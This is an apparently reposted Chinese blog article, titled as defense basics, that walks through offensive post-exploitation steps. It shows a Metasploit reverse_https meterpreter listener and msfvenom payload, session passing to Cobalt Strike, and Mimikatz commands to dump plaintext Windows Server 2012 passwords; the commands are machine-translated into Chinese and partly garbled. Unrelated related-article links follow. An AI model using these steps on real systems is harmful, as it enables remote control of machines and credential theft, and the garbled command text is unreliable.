防御保护基础?防御和保护的区别

防御保护基础cs与msf权限传递
1. 在Metasploit中获取会话 # 在Metasploit中设置监听器 use exploit/multi/handler set payload windows/meterpreter/reve

cs与msf权限传递

1. 与Metasploit 进行会话

# 使用Metasploit 配置监听器

使用漏洞/多重/处理程序

负载设置windows/meterpreter/reverse_https

设置LHOST [Metasploit 主机IP]

设置LPORT [选定端口]

开发

# 在目标系统上执行Metasploit生成的payload

# 使用msfvenom 生成可执行文件,例如

msfvenom -p windows/meterpreter/reverse_https LHOST=[Metasploit 主机IP] LPORT=[选定端口] -f exe Payload.exe

2. 通过Cobalt Strike 接收会话

# 使用Cobalt Strike 设置监听器

# 打开Cobalt Strike客户端并连接服务器

#创建一个新的监听器并选择HTTPS beacon

#设置IP和端口,保存并启动监听

# 使用Metasploit 获得的会话在线连接到Cobalt Strike

# 在Metasploit 中,使用以下命令将会话传递给Cobalt Strike

使用exploit/windows/local/payload_inject

负载设置windows/meterpreter/reverse_https

设置LHOST [Metasploit 主机IP]

设置LPORT [选定端口]

设置SESSION [Metasploit 会话ID]

将DisablePayloadHandler 设置为true

开发

mimikatz抓取win2012明文密码

1. 将Mimikatz 上传到Cobalt Strike

# 将Mimikatz 上传到Cobalt Strike 目标系统

上传/path/to/mimikatz.exe

2. 在目标系统上运行Mimikatz。

# 在Cobalt Strike 命令行上运行Mimikatz

运行程序集/path/to/mimikatz.exe

3.使用Mimikatz获取纯文本密码

# 在Mimikatz中,使用以下命令获取明文密码

权限: 调试

sekurlsa: 登录密码

以上基于#防御与保护的相关内容摘自网络,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92744.html

(0)
CSDN's avatarCSDN
上一篇 2024年6月28日 下午1:22
下一篇 2024年6月28日 下午1:41

相关推荐

  • c语言编程用什么编写

    C语言编程常用的开发工具有3种,分别是Visual Studio Code、Code::Blocks、和Dev-C++。 Visual Studio Code (VS Code) …

    网站运维 2024年5月12日
    0
  • 国内最大的问答平台,问答网站排名

    大型问答网站知多少:带你探索丰富的知识宝库 简介 我们内容丰富的问答网站为人们提供了广阔的学习和交流平台,具有丰富的知识库和便捷的搜索功能。在本文中,我们将仔细研究一些领先的问答网…

    2024年4月29日
    0
  • 瑞丰LR智能录播系统

    高清录播主机采用嵌入式Linux操作系统,高清画质,1920*1080分辨率录制、预览、网络传输;高保真立体声音烦,支持两路电容麦输入,带48V幻象供电,支持线

    2024年8月30日
    0
  • SQL技巧游标

    游标概念游标实际上是一种能从包括多条数据记录的结果集中每次提取一条记录的机制。游标充当指针的作用,尽管游标能遍历结果集中的所有行,但他一次只能指向一行。游标操作

    2024年9月18日
    0

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注